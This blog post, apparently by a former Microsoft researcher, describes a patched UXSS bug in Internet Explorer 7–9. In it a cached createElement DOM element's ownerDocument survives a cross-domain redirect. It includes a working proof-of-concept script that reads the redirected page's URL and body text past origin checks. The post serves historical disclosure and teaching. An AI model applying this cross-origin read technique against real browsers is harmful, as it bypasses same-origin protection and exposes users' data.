UXSS: createElement Cached Reference Survives Redirect

Another variation on the cached-reference UXSS theme. This time the object that survives navigation is a plain DOM element created with createElement. After inserting the element into the window’s document and then letting the window redirect to a different domain, the cached element’s ownerDocument property points to the new domain’s document — with no origin checks applied.

<script language="JavaScript">
var win, pDiv;

function main()
{
    win = window.open("redirect.aspx");
    pDiv = win.document.createElement("DIV");
    win.document.appendChild(pDiv); // Very important to insert the element otherwise it won't work.

    setTimeout('pDiv.ownerDocument.parentWindow.alert(pDiv.ownerDocument.URL + "\\n\\n" +pDiv.ownerDocument.body.innerText);', 2000);
}
</script>
<input type="button" onclick="main()" value="Open Window and read its contents">

The element must actually be inserted into the document before the redirect — a detached element does not maintain the live ownerDocument reference in the same way. After two seconds the ownerDocument is pointing at the redirected page, and parentWindow.alert() fires in that context. This worked on Vista IE7 and Windows 7 IE8/IE9.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 EoP: Crashing the Browser by Resizing a Persistent createPopup] :: [Pseudo-UXSS: external.returnValue Shared Across Domains in Modal Dialogs] >